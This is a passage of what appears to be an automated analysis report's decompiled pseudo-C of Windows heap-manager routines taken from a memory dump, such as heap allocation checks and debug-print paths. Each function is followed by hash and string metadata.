                                  						_a4 = _t445;
                                  						_v40 = 1;
                                  					} else {
                                  						_t27 =  &_v36;
                                  						 *_t27 = _v36 & 0x00000000;
                                  						__eflags =  *_t27;
                                  					}
                                  					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                  					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                  						_v44 = _t513;
                                  						_t262 = E0189A9EF(_t541, _t513);
                                  						__eflags = _a8;
                                  						_v32 = _t262;
                                  						if(_a8 != 0) {
                                  							__eflags = _t262;
                                  							if(_t262 == 0) {
                                  								goto L19;
                                  							}
                                  						}
                                  						__eflags =  *0x1988748 - 1;
                                  						if( *0x1988748 >= 1) {
                                  							__eflags = _t262;
                                  							if(_t262 == 0) {
                                  								_t415 =  *[fs:0x30];
                                  								__eflags =  *(_t415 + 0xc);
                                  								if( *(_t415 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E0189B150();
                                  								} else {
                                  									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_push("(UCRBlock != NULL)");
                                  								E0189B150();
                                  								__eflags =  *0x1987bc8;
                                  								if( *0x1987bc8 == 0) {
                                  									__eflags = 1;
                                  									E01952073(_t445, 1, _t541, 1);
                                  								}
                                  								_t513 = _v48;
                                  								_t445 = _a4;
                                  							}
                                  						}
                                  						_t350 = _v40;
                                  						_t480 = _t445 << 3;
                                  						_v20 = _t480;
                                  						_t481 = _t480 + _t513;
                                  						_v24 = _t481;
                                  						__eflags = _t350;
                                  						if(_t350 == 0) {
                                  							_t481 = _t481 + 0xfffffff0;
                                  							__eflags = _t481;
                                  						}
                                  						_t483 = (_t481 & 0xfffff000) - _v44;
                                  						__eflags = _t483;
                                  						_v52 = _t483;
                                  						if(_t483 == 0) {
                                  							__eflags =  *0x1988748 - 1;
                                  							if( *0x1988748 < 1) {
                                  								goto L9;
                                  							}
                                  							__eflags = _t350;
                                  							goto L146;
                                  						} else {
                                  							_t352 = E018C174B( &_v44,  &_v52, 0x4000);
                                  							__eflags = _t352;
                                  							if(_t352 < 0) {
                                  								goto L94;
                                  							}
                                  							_t353 = E018B7D50();
                                  							_t447 = 0x7ffe0380;
                                  							__eflags = _t353;
                                  							if(_t353 != 0) {
                                  								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  							} else {
                                  								_t356 = 0x7ffe0380;
                                  							}
                                  							__eflags =  *_t356;
                                  							if( *_t356 != 0) {
                                  								_t357 =  *[fs:0x30];
                                  								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                  								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                  									E019514FB(_t447, _t553, _v44, _v52, 5);
                                  								}
                                  							}
                                  							_t358 = _v32;
                                  							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                  							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                  							__eflags = _t484 - 0x7f000;
                                  							if(_t484 >= 0x7f000) {
                                  								_t90 = _t553 + 0x1ec;
                                  								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                  								__eflags =  *_t90;
                                  							}
                                  							E01899373(_t553, _t358);
                                  							_t486 = _v32;
                                  							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                  							E01899819(_t486);
                                  							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                  							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                  							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                  							__eflags = _t366 - 0x7f000;
                                  							if(_t366 >= 0x7f000) {
                                  								_t104 = _t553 + 0x1ec;
                                  								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                  								__eflags =  *_t104;
                                  							}
                                  							__eflags = _v40;
                                  							if(_v40 == 0) {
                                  								_t533 = _v52 + _v44;
                                  								_v32 = _t533;
                                  								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                  								__eflags = _v24 - _v52 + _v44;
                                  								if(_v24 == _v52 + _v44) {
                                  									__eflags =  *(_t553 + 0x4c);
                                  									if( *(_t553 + 0x4c) != 0) {
                                  										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                  										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                  									}
                                  								} else {
                                  									_t449 = 0;
                                  									_t533[3] = 0;
                                  									_t533[1] = 0;
                                  									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                  									_t491 = _t394;
                                  									 *_t533 = _t394;
                                  									__eflags =  *0x1988748 - 1; // 0x0
                                  									if(__eflags >= 0) {
                                  										__eflags = _t491 - 1;
                                  										if(_t491 <= 1) {
                                  											_t404 =  *[fs:0x30];
                                  											__eflags =  *(_t404 + 0xc);
                                  											if( *(_t404 + 0xc) == 0) {
                                  												_push("HEAP: ");
                                  												E0189B150();
                                  											} else {
                                  												E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  											}
                                  											_push("((LONG)FreeEntry->Size > 1)");
                                  											E0189B150();
                                  											_pop(_t491);
                                  											__eflags =  *0x1987bc8 - _t449; // 0x0
                                  											if(__eflags == 0) {
                                  												__eflags = 0;
                                  												_t491 = 1;
                                  												E01952073(_t449, 1, _t541, 0);
                                  											}
                                  											_t533 = _v32;
                                  										}
                                  									}
                                  									_t533[1] = _t449;
                                  									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                  									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                  										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                  										_v16 = _t402;
                                  										__eflags = _t402 - 0xfe;
                                  										if(_t402 >= 0xfe) {
                                  											_push(_t491);
                                  											_push(_t449);
                                  											E0195A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                  											_t533 = _v48;
                                  											_t402 = _v32;
                                  										}
                                  										_t449 = _t402;
                                  									}
                                  									_t533[3] = _t449;
                                  									E018BA830(_t553, _t533,  *_t533 & 0x0000ffff);
                                  									_t447 = 0x7ffe0380;
                                  								}
                                  							}
                                  							_t367 = E018B7D50();
                                  							__eflags = _t367;
                                  							if(_t367 != 0) {
                                  								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  							} else {
                                  								_t370 = _t447;
                                  							}
                                  							__eflags =  *_t370;
                                  							if( *_t370 != 0) {
                                  								_t371 =  *[fs:0x30];
                                  								__eflags =  *(_t371 + 0x240) & 1;
                                  								if(( *(_t371 + 0x240) & 1) != 0) {
                                  									__eflags = E018B7D50();
                                  									if(__eflags != 0) {
                                  										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  									}
                                  									E01951411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                  								}
                                  							}
                                  							_t372 = E018B7D50();
                                  							_t546 = 0x7ffe038a;
                                  							_t446 = 0x230;
                                  							__eflags = _t372;
                                  							if(_t372 != 0) {
                                  								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                  							} else {
                                  								_t246 = 0x7ffe038a;
                                  							}
                                  							__eflags =  *_t246;
                                  							if( *_t246 == 0) {
                                  								goto L7;
                                  							} else {
                                  								__eflags = E018B7D50();
                                  								if(__eflags != 0) {
                                  									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                  									__eflags = _t546;
                                  								}
                                  								_push( *_t546 & 0x000000ff);
                                  								_push(_v36);
                                  								_push(_v40);
                                  								goto L120;
                                  							}
                                  						}
                                  					} else {
                                  						L19:
                                  						_t31 = _t513 + 0x101f; // 0x101f
                                  						_t455 = _t31 & 0xfffff000;
                                  						_t32 = _t513 + 0x28; // 0x28
                                  						_v44 = _t455;
                                  						__eflags = _t455 - _t32;
                                  						if(_t455 == _t32) {
                                  							_t455 = _t455 + 0x1000;
                                  							_v44 = _t455;
                                  						}
                                  						_t265 = _t445 << 3;
                                  						_v24 = _t265;
                                  						_t266 = _t265 + _t513;
                                  						__eflags = _v40;
                                  						_v20 = _t266;
                                  						if(_v40 == 0) {
                                  							_t266 = _t266 + 0xfffffff0;
                                  							__eflags = _t266;
                                  						}
                                  						_t267 = _t266 & 0xfffff000;
                                  						_v52 = _t267;
                                  						__eflags = _t267 - _t455;
                                  						if(_t267 < _t455) {
                                  							__eflags =  *0x1988748 - 1; // 0x0
                                  							if(__eflags < 0) {
                                  								L9:
                                  								_t450 = _t553;
                                  								L10:
                                  								_push(_t445);
                                  								goto L11;
                                  							}
                                  							__eflags = _v40;
                                  							L146:
                                  							if(__eflags == 0) {
                                  								goto L9;
                                  							}
                                  							_t270 =  *[fs:0x30];
                                  							__eflags =  *(_t270 + 0xc);
                                  							if( *(_t270 + 0xc) == 0) {
                                  								_push("HEAP: ");
                                  								E0189B150();
                                  							} else {
                                  								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  							}
                                  							_push("(!TrailingUCR)");
                                  							E0189B150();
                                  							__eflags =  *0x1987bc8;
                                  							if( *0x1987bc8 == 0) {
                                  								__eflags = 0;
                                  								E01952073(_t445, 1, _t541, 0);
                                  							}
                                  							L152:
                                  							_t445 = _a4;
                                  							L153:
                                  							_t513 = _v48;
                                  							goto L9;
                                  						}
                                  						_v32 = _t267;
                                  						_t280 = _t267 - _t455;
                                  						_v32 = _v32 - _t455;
                                  						__eflags = _a8;
                                  						_t460 = _v32;
                                  						_v52 = _t460;
                                  						if(_a8 != 0) {
                                  							L27:
                                  							__eflags = _t280;
                                  							if(_t280 == 0) {
                                  								L33:
                                  								_t446 = 0;
                                  								__eflags = _v40;
                                  								if(_v40 == 0) {
                                  									_t468 = _v44 + _v52;
                                  									_v36 = _t468;
                                  									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                  									__eflags = _v20 - _v52 + _v44;
                                  									if(_v20 == _v52 + _v44) {
                                  										__eflags =  *(_t553 + 0x4c);
                                  										if( *(_t553 + 0x4c) != 0) {
                                  											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                  											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                  										}
                                  									} else {
                                  										_t468[3] = 0;
                                  										_t468[1] = 0;
                                  										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                  										_t521 = _t317;
                                  										 *_t468 = _t317;
                                  										__eflags =  *0x1988748 - 1; // 0x0
                                  										if(__eflags >= 0) {
                                  											__eflags = _t521 - 1;
                                  											if(_t521 <= 1) {
                                  												_t327 =  *[fs:0x30];
                                  												__eflags =  *(_t327 + 0xc);
                                  												if( *(_t327 + 0xc) == 0) {
                                  													_push("HEAP: ");
                                  													E0189B150();
                                  												} else {
                                  													E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  												}
                                  												_push("(LONG)FreeEntry->Size > 1");
                                  												E0189B150();
                                  												__eflags =  *0x1987bc8 - _t446; // 0x0
                                  												if(__eflags == 0) {
                                  													__eflags = 1;
                                  													E01952073(_t446, 1, _t541, 1);
                                  												}
                                  												_t468 = _v36;
                                  											}
                                  										}
                                  										_t468[1] = _t446;
                                  										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                  										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                  										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                  											_t320 = _t446;
                                  										} else {
                                  											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                  											_v12 = _t320;
                                  											__eflags = _t320 - 0xfe;
                                  											if(_t320 >= 0xfe) {
                                  												_push(_t468);
                                  												_push(_t446);
                                  												E0195A80D(_t522, 3, _t468, _t541);
                                  												_t468 = _v52;
                                  												_t320 = _v28;
                                  											}
                                  										}
                                  										_t468[3] = _t320;
                                  										E018BA830(_t553, _t468,  *_t468 & 0x0000ffff);
                                  									}
                                  								}
                                  								E018BB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                  								E018BA830(_t553, _v64, _v24);
                                  								_t286 = E018B7D50();
                                  								_t542 = 0x7ffe0380;
                                  								__eflags = _t286;
                                  								if(_t286 != 0) {
                                  									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  								} else {
                                  									_t289 = 0x7ffe0380;
                                  								}
                                  								__eflags =  *_t289;
                                  								if( *_t289 != 0) {
                                  									_t290 =  *[fs:0x30];
                                  									__eflags =  *(_t290 + 0x240) & 1;
                                  									if(( *(_t290 + 0x240) & 1) != 0) {
                                  										__eflags = E018B7D50();
                                  										if(__eflags != 0) {
                                  											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  										}
                                  										E01951411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                  									}
                                  								}
                                  								_t291 = E018B7D50();
                                  								_t543 = 0x7ffe038a;
                                  								__eflags = _t291;
                                  								if(_t291 != 0) {
                                  									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                  								} else {
                                  									_t246 = 0x7ffe038a;
                                  								}
                                  								__eflags =  *_t246;
                                  								if( *_t246 != 0) {
                                  									__eflags = E018B7D50();
                                  									if(__eflags != 0) {
                                  										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                  										__eflags = _t543;
                                  									}
                                  									_push( *_t543 & 0x000000ff);
                                  									_push(_t446);
                                  									_push(_t446);
                                  									L120:
                                  									_push( *(_t553 + 0x74) << 3);
                                  									_push(_v52);
                                  									_t246 = E01951411(_t446, _t553, _v44, __eflags);
                                  								}
                                  								goto L7;
                                  							}
                                  							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                  							_t339 = E018C174B( &_v44,  &_v52, 0x4000);
                                  							__eflags = _t339;
                                  							if(_t339 < 0) {
                                  								L94:
                                  								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                  								__eflags = _v40;
                                  								if(_v40 == 0) {
                                  									goto L153;
                                  								}
                                  								E018BB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                  								goto L152;
                                  							}
                                  							_t344 = E018B7D50();
                                  							__eflags = _t344;
                                  							if(_t344 != 0) {
                                  								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                  							} else {
                                  								_t347 = 0x7ffe0380;
                                  							}
                                  							__eflags =  *_t347;
                                  							if( *_t347 != 0) {
                                  								_t348 =  *[fs:0x30];
                                  								__eflags =  *(_t348 + 0x240) & 1;
                                  								if(( *(_t348 + 0x240) & 1) != 0) {
                                  									E019514FB(_t445, _t553, _v44, _v52, 6);
                                  								}
                                  							}
                                  							_t513 = _v48;
                                  							goto L33;
                                  						}
                                  						__eflags =  *_v12 - 3;
                                  						_t513 = _v48;
                                  						if( *_v12 == 3) {
                                  							goto L27;
                                  						}
                                  						__eflags = _t460;
                                  						if(_t460 == 0) {
                                  							goto L9;
                                  						}
                                  						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                  						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                  							goto L9;
                                  						}
                                  						goto L27;
                                  					}
                                  				}
                                  				_t445 = _a4;
                                  				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                  					_t513 = __edx;
                                  					goto L10;
                                  				}
                                  				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                  				_v20 = _t433;
                                  				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                  					_t513 = _t539;
                                  					goto L9;
                                  				} else {
                                  					_t437 = E018B99BF(__ecx, __edx,  &_a4, 0);
                                  					_t445 = _a4;
                                  					_t514 = _t437;
                                  					_v56 = _t514;
                                  					if(_t445 - 0x201 > 0xfbff) {
                                  						goto L14;
                                  					} else {
                                  						E018BA830(__ecx, _t514, _t445);
                                  						_t506 =  *(_t553 + 0x238);
                                  						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                  						_t246 = _t506 >> 4;
                                  						if(_t551 < _t506 - _t246) {
                                  							_t508 =  *(_t553 + 0x23c);
                                  							_t246 = _t508 >> 2;
                                  							__eflags = _t551 - _t508 - _t246;
                                  							if(_t551 > _t508 - _t246) {
                                  								_t246 = E018CABD8(_t553);
                                  								 *(_t553 + 0x23c) = _t551;
                                  								 *(_t553 + 0x238) = _t551;
                                  							}
                                  						}
                                  						goto L7;
                                  					}
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-523794902
                                  • Opcode ID: e9073c5d850cfde3e714ac231b4fe60a2cae2f9d2f2036d6d7ee36648e194f98
                                  • Instruction ID: a73b57b41efe6ac2a772ec2487c23d62f53a79a5e80850f1106dfc7083642067
                                  • Opcode Fuzzy Hash: e9073c5d850cfde3e714ac231b4fe60a2cae2f9d2f2036d6d7ee36648e194f98
                                  • Instruction Fuzzy Hash: E742E0316087419FD71ADF28C4C4A6ABBE5FF88704F08496DE58ACB391D734DA85CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E01952D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t83;
                                  				signed char _t89;
                                  				intOrPtr _t90;
                                  				signed char _t101;
                                  				signed int _t102;
                                  				intOrPtr _t104;
                                  				signed int _t105;
                                  				signed int _t106;
                                  				intOrPtr _t108;
                                  				intOrPtr _t112;
                                  				short* _t130;
                                  				short _t131;
                                  				signed int _t148;
                                  				intOrPtr _t149;
                                  				signed int* _t154;
                                  				short* _t165;
                                  				signed int _t171;
                                  				void* _t182;
                                  
                                  				_push(0x44);
                                  				_push(0x1970e80);
                                  				E018ED0E8(__ebx, __edi, __esi);
                                  				_t177 = __edx;
                                  				_t181 = __ecx;
                                  				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                  				 *((char*)(_t182 - 0x1d)) = 0;
                                  				 *(_t182 - 0x24) = 0;
                                  				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                  					 *((intOrPtr*)(_t182 - 4)) = 0;
                                  					 *((intOrPtr*)(_t182 - 4)) = 1;
                                  					_t83 = E018940E1("RtlAllocateHeap");
                                  					__eflags = _t83;
                                  					if(_t83 == 0) {
                                  						L48:
                                  						 *(_t182 - 0x24) = 0;
                                  						L49:
                                  						 *((intOrPtr*)(_t182 - 4)) = 0;
                                  						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                  						E019530C4();
                                  						goto L50;
                                  					}
                                  					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                  					 *(_t182 - 0x28) = _t89;
                                  					 *(_t182 - 0x3c) = _t89;
                                  					_t177 =  *(_t182 + 8);
                                  					__eflags = _t177;
                                  					if(_t177 == 0) {
                                  						_t171 = 1;
                                  						__eflags = 1;
                                  					} else {
                                  						_t171 = _t177;
                                  					}
                                  					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                  					__eflags = _t148 - 0x10;
                                  					if(_t148 < 0x10) {
                                  						_t148 = 0x10;
                                  					}
                                  					_t149 = _t148 + 8;
                                  					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                  					__eflags = _t149 - _t177;
                                  					if(_t149 < _t177) {
                                  						L44:
                                  						_t90 =  *[fs:0x30];
                                  						__eflags =  *(_t90 + 0xc);
                                  						if( *(_t90 + 0xc) == 0) {
                                  							_push("HEAP: ");
                                  							E0189B150();
                                  						} else {
                                  							E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  						}
                                  						_push( *((intOrPtr*)(_t181 + 0x78)));
                                  						E0189B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                  						goto L48;
                                  					} else {
                                  						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                  						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                  							goto L44;
                                  						}
                                  						__eflags = _t89 & 0x00000001;
                                  						if((_t89 & 0x00000001) != 0) {
                                  							_t178 =  *(_t182 - 0x28);
                                  						} else {
                                  							E018AEEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                  							 *((char*)(_t182 - 0x1d)) = 1;
                                  							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                  							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                  						}
                                  						E01954496(_t181, 0);
                                  						_t177 = L018B4620(_t181, _t181, _t178,  *(_t182 + 8));
                                  						 *(_t182 - 0x24) = _t177;
                                  						_t173 = 1;
                                  						E019549A4(_t181);
                                  						__eflags = _t177;
                                  						if(_t177 == 0) {
                                  							goto L49;
                                  						} else {
                                  							_t177 = _t177 + 0xfffffff8;
                                  							__eflags =  *((char*)(_t177 + 7)) - 5;
                                  							if( *((char*)(_t177 + 7)) == 5) {
                                  								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                  								__eflags = _t177;
                                  							}
                                  							_t154 = _t177;
                                  							 *(_t182 - 0x40) = _t177;
                                  							__eflags =  *(_t181 + 0x4c);
                                  							if( *(_t181 + 0x4c) != 0) {
                                  								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                  								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                  								if(__eflags != 0) {
                                  									_push(_t154);
                                  									_t173 = _t177;
                                  									E0194FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                  								}
                                  							}
                                  							__eflags =  *(_t177 + 2) & 0x00000002;
                                  							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                  								_t101 =  *(_t177 + 3);
                                  								 *(_t182 - 0x29) = _t101;
                                  								_t102 = _t101 & 0x000000ff;
                                  							} else {
                                  								_t130 = E01891F5B(_t177);
                                  								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                  								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                  								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                  									 *_t130 = 0;
                                  								} else {
                                  									_t131 = E018C16C7(1, _t173);
                                  									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                  									 *_t165 = _t131;
                                  									_t130 = _t165;
                                  								}
                                  								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                  							}
                                  							 *(_t182 - 0x34) = _t102;
                                  							 *(_t182 - 0x28) = _t102;
                                  							__eflags =  *(_t181 + 0x4c);
                                  							if( *(_t181 + 0x4c) != 0) {
                                  								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                  								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                  								__eflags =  *_t177;
                                  							}
                                  							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                  							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                  								__eflags = 0;
                                  								E01954496(_t181, 0);
                                  							}
                                  							__eflags =  *(_t182 - 0x24) -  *0x1986360; // 0x0
                                  							_t104 =  *[fs:0x30];
                                  							if(__eflags != 0) {
                                  								_t105 =  *(_t104 + 0x68);
                                  								 *(_t182 - 0x4c) = _t105;
                                  								__eflags = _t105 & 0x00000800;
                                  								if((_t105 & 0x00000800) == 0) {
                                  									goto L49;
                                  								}
                                  								_t106 =  *(_t182 - 0x34);
                                  								__eflags = _t106;
                                  								if(_t106 == 0) {
                                  									goto L49;
                                  								}
                                  								__eflags = _t106 -  *0x1986364; // 0x0
                                  								if(__eflags != 0) {
                                  									goto L49;
                                  								}
                                  								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1986366; // 0x0
                                  								if(__eflags != 0) {
                                  									goto L49;
                                  								}
                                  								_t108 =  *[fs:0x30];
                                  								__eflags =  *(_t108 + 0xc);
                                  								if( *(_t108 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E0189B150();
                                  								} else {
                                  									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_push(E0193D455(_t181,  *(_t182 - 0x28)));
                                  								_push( *(_t182 + 8));
                                  								E0189B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                  								goto L34;
                                  							} else {
                                  								__eflags =  *(_t104 + 0xc);
                                  								if( *(_t104 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E0189B150();
                                  								} else {
                                  									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_push( *(_t182 + 8));
                                  								E0189B150("Just allocated block at %p for %Ix bytes\n",  *0x1986360);
                                  								L34:
                                  								_t112 =  *[fs:0x30];
                                  								__eflags =  *((char*)(_t112 + 2));
                                  								if( *((char*)(_t112 + 2)) != 0) {
                                  									 *0x1986378 = 1;
                                  									 *0x19860c0 = 0;
                                  									asm("int3");
                                  									 *0x1986378 = 0;
                                  								}
                                  								goto L49;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t181 =  *0x1985708; // 0x0
                                  					 *0x198b1e0(__ecx, __edx,  *(_t182 + 8));
                                  					 *_t181();
                                  					L50:
                                  					return E018ED130(0, _t177, _t181);
                                  				}
                                  			}





















                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                  • API String ID: 0-1745908468
                                  • Opcode ID: b34218882b9d994ca32f6bb0254a15190d6c2cb1d857da4d3101d56bc23561d2
                                  • Instruction ID: 3f2b2946225ca9a3ca7e29b68351fea4f90e956051b750ae0355c15fb25703a5
                                  • Opcode Fuzzy Hash: b34218882b9d994ca32f6bb0254a15190d6c2cb1d857da4d3101d56bc23561d2
                                  • Instruction Fuzzy Hash: DF912131610B41DFDB62DFA8D454AADBBF2FF49B00F18841DE94AAB351C7329A41CB01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E018A3D34(signed int* __ecx) {
                                  				signed int* _v8;
                                  				char _v12;
                                  				signed int* _v16;
                                  				signed int* _v20;
                                  				char _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				char _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				signed int* _v48;
                                  				signed int* _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				char _v68;
                                  				signed int _t140;
                                  				signed int _t161;
                                  				signed int* _t236;
                                  				signed int* _t242;
                                  				signed int* _t243;
                                  				signed int* _t244;
                                  				signed int* _t245;
                                  				signed int _t255;
                                  				void* _t257;
                                  				signed int _t260;
                                  				void* _t262;
                                  				signed int _t264;
                                  				void* _t267;
                                  				signed int _t275;
                                  				signed int* _t276;
                                  				short* _t277;
                                  				signed int* _t278;
                                  				signed int* _t279;
                                  				signed int* _t280;
                                  				short* _t281;
                                  				signed int* _t282;
                                  				short* _t283;
                                  				signed int* _t284;
                                  				void* _t285;
                                  
                                  				_v60 = _v60 | 0xffffffff;
                                  				_t280 = 0;
                                  				_t242 = __ecx;
                                  				_v52 = __ecx;
                                  				_v8 = 0;
                                  				_v20 = 0;
                                  				_v40 = 0;
                                  				_v28 = 0;
                                  				_v32 = 0;
                                  				_v44 = 0;
                                  				_v56 = 0;
                                  				_t275 = 0;
                                  				_v16 = 0;
                                  				if(__ecx == 0) {
                                  					_t280 = 0xc000000d;
                                  					_t140 = 0;
                                  					L50:
                                  					 *_t242 =  *_t242 | 0x00000800;
                                  					_t242[0x13] = _t140;
                                  					_t242[0x16] = _v40;
                                  					_t242[0x18] = _v28;
                                  					_t242[0x14] = _v32;
                                  					_t242[0x17] = _t275;
                                  					_t242[0x15] = _v44;
                                  					_t242[0x11] = _v56;
                                  					_t242[0x12] = _v60;
                                  					return _t280;
                                  				}
                                  				if(E018A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                  					_v56 = 1;
                                  					if(_v8 != 0) {
